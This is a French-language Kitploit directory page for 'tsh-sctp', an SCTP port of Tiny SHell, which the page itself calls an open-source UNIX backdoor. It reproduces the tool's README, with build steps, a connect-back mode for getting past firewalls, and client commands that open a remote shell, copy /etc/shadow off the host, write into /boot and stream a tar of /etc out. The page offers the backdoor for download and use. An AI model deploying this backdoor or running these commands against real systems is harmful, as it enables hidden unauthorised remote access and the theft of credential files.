Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
tsh-sctp — TinySHell port to SCTP | Kitploit
Outils/GitHubGitHub/infodox/tsh-sctp
Post-ExploitationPenetration TestingCommand and ControlRed TeamingRemote Access ToolPayload Development
GitHubinfodox/tsh-sctp

tsh-sctp

TinySHell port to SCTP

Voir le dépôt
12528il y a 12 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

Tiny SHell - Un backdoor UNIX open-source

root@kitploit:~
* Avant de compiler Tiny SHell

    1. Tout d'abord, vous devez configurer votre clé secrète, située dans tsh.h ; la clé peut être de n'importe quelle longueur (utilisez au moins 12 caractères pour une meilleure sécurité).

    2. Il est conseillé de changer SERVER_PORT, le port sur lequel le serveur écoutera les connexions entrantes.

    3. Vous pouvez démarrer tshd en mode « connect-back » s'il s'exécute sur une machine protégée par un pare-feu ; il suffit de décommenter et de modifier CONNECT_BACK_HOST dans tsh.h.

* Compilation de Tiny SHell

    Exécutez « make <system> », où <system> peut être l'un de ceux-ci : linux, freebsd, openbsd, netbsd, cygwin, sunos, irix, hpux, osf

* Comment utiliser le serveur

    Il peut être utile de définir $HOME et le masque de création de fichiers avant de démarrer le serveur :

        % umask 077; HOME=/var/tmp ./tshd

* Comment utiliser le client

    Assurez-vous que tshd est en cours d'exécution sur l'hôte distant. Vous pouvez :

    - lancer un shell :

        ./tsh <hostname>

    - exécuter une commande :

        ./tsh <hostname> "uname -a"

    - transférer des fichiers :

        ./tsh <hostname> get /etc/shadow .
        ./tsh <hostname> put vmlinuz /boot

    Remarque : si le serveur fonctionne en mode connect-back, remplacez le nom d'hôte de la machine distante par « cb ».

* À propos des transferts de fichiers multiples

    Actuellement, Tiny SHell ne prend pas en charge les transferts de fichiers multiples et/ou récursifs de type scp. Vous pouvez contourner ce bogue en créant simplement une archive tar et en la transférant. Exemple :

    ./tsh host "stty raw; tar -cf - /etc 2>/dev/null" | tar -xvf -

* À propos des modes terminaux

    Sur certains systèmes peu évolués (en fait, IRIX et HP-UX), Ctrl-C et d'autres touches de contrôle ne fonctionnent pas correctement. Corrigez-le avec :

        % stty intr "^C" erase "^H" eof "^D" susp "^Z" kill "^U"

* À propos de la sécurité

    N'oubliez pas que la clé secrète est stockée en clair à la fois dans les exécutables tsh et tshd ; vous devez donc vous assurer que personne d'autre que vous n'a un accès en lecture à ces deux fichiers. Cependant, vous pouvez choisir de ne pas stocker la clé réelle (valide) dans le client, qui demandera alors un mot de passe au démarrage.

* Remarques concernant la version SCTP :
Testé uniquement sur Archlinux jusqu'à présent, attendez-vous à ce qu'il échoue de manière hideuse sur tout autre système.
C'est un bidouillage assez moche, avec quelques erreurs de compilation que je prévois de traquer et de corriger à terme.
La sécurité du fichier backdoor (tsh) - c'est-à-dire le mot de passe en clair - doit être corrigée prochainement en ne stockant qu'un mot de passe haché.
Tests sur hpux, *bsd, etc. dès que j'aurai accès à de telles machines.
Télécharger l’outil